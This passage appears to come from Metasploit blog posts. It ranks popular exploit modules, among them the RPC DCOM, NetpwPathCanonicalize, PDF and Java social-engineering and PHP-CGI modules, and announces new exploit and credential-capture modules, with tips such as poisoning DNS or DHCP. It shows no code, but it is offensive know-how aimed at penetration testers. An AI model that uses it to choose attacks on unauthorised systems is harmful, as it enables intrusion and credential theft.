  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft’s Security TechCenter. Same position as last month.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Same position as last month.

  5. MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (CVE-2012-1875): This module was mentioned in the IE Zero-Day Exploits blog post along with the XML Core Services bug, CVE-2012-1889. Also like the XML Core services bug, this bug was being actively exploited in the wild in June of 2012. Unlike the XML Core Services bug, though, this one had a patch. I suspect there was some confusion about which bug was patched and which wasn't, given the modules were released close together and both were mentioned in the same post. Regardless, given the recency of these modules, it's not surprising to see them leap into the top ten for June. Same position as last month.

  6. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic in at the National Vulnerability Database.  Up 4 places from #10 this month.

  7. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic in at the National Vulnerability Database. Up 1 place from #8 since last month.

  8. Java Signed Applet Social Engineering Code Execution: This module has been a long-time coming to the Top 10 list. Like the Adobe PDF Embedded EXE Social Engineering module, this is a really solid go-to module for social engineering payloads. A simple Google search turns up dozens of demonstration videos from all around the world on how to use this module. New entry this month.

  9. PHP CGI Argument Injection: This module is a returning contender from the May 2012 Top 10 list. This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installtions, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. Returning entry from May 2012.
  10. Joomla 1.5.12 TinyBrowser File Upload Code Execution: A bit of a surprise entry, this bug is two and a half years old and not on common software. However, there are how-to videos which appear in search results for "Joomla Metasploit." Links related to videos often have higher-click through rates. New entry this month.

 

Do you have any insight into July's Top 10 Exploits? Please let us know in the comments below.


If you want to use any of these exploits right now, you can download Metasploit for free

The Vegas and vacation season is behind us, so it's time to release our first post-4.4.0 update. Here we go!

 

Exploit Tsunami

 

A few factors conspired to make this update more module-heavy than usual. We released Metasploit 4.4 in mid-July. Historically, a dot version release of Metasploit means that we spend a little post-release time closing out bugs, performing some internal housekeeping that we'd been putting off, and other boring software engineering tasks. Right after this exercise, it was Vegas season for the security crowd, and pretty huge chunk of Metasploit was out there for BlackHat, DefCon, and BSides. Related to DefCon season, we had an unusually high volume of module submissions in the last two weeks.

 

So, we end up with a union of module backlog and a bumper crop of exploits and auxiliary modules. This update brings new exploits for, in no particular order, Symantec Web Gateway, Zenoss, the Linux Kernel, CuteFlow, WebPageTest, Nmap, EGallery, Cisco Linksys WVC200, Microsoft Internet Explorer, Photodex ProShow Producer, Dell SonicWALL Scrutinizer, Simple Web Server, Windows Task Scheduler, Microsoft Office SharePoint Server, and Novell ZENworks.

 

Authentication Capture

 

Community contributor Patrik Karlsson (aka, @nevdull77) has been on fire lately with his Authentication Capture modules -- this update has modules for impersonating MySQL and SIP servers to go along with his DB2, Microsoft SQL, and VNC server auth capture modules.

 

The basic idea with these is that you, as a penetration tester, trick your victim into providing authentication credentials to your fake server (which is really a Metasploit instance). This can be done in a variety of ways. If you're local to the victim, you can pretty trivially poison DNS or DHCP to get your victim to the wrong place. If you're remote, it might be just a matter of social engineering, or domain squatting, or something along those lines.

 

Of course, this isn't the only use of these modules. Having a responsive authentication service at your fingertips is a super-handy research tool if you're interested in experimenting with how different clients behave, or if you're looking in training up a protocol analyzer or something like that. They're really pretty versatile, so thanks tons nevdull for your work on these!

 

Lone Star Ruby Conf

 

Almost totally unrelated to Metasploit updates, I'm seizing this blog post to point at my upcoming talk Lone Star Ruby Conf 6 here in Austin at the end of the week. It's entitled "Offensive Ruby," and I'll be speaking on Friday morning. The abstract is linked from the LSRC page -- the shorter of the short stories is, I'll be talking about how the security community has adopted Ruby for its own, and give demos. I intend to deliver a whirlwind tour of PacketFu, Ronin, Ruby BlackBag, Arachni, Metasm, and... well I guess I'll talk about Metasploit, too. (:

 

It's a developer conference, not a security conference, so my whole goal there is to remind the dev community that we exist, and not everyone who uses Ruby is using it to build out web apps and RSS readers. LSRC is notable in that it's not RailsConf, so that barrier shouldn't be too hard to breach -- there are lots of people there using Ruby for weird and wonderful applications. Should be fun, so if you happen to be there, track me down to say "hi."

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Auxiliary modules

Exploit modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Filter Blog

By date: By tag: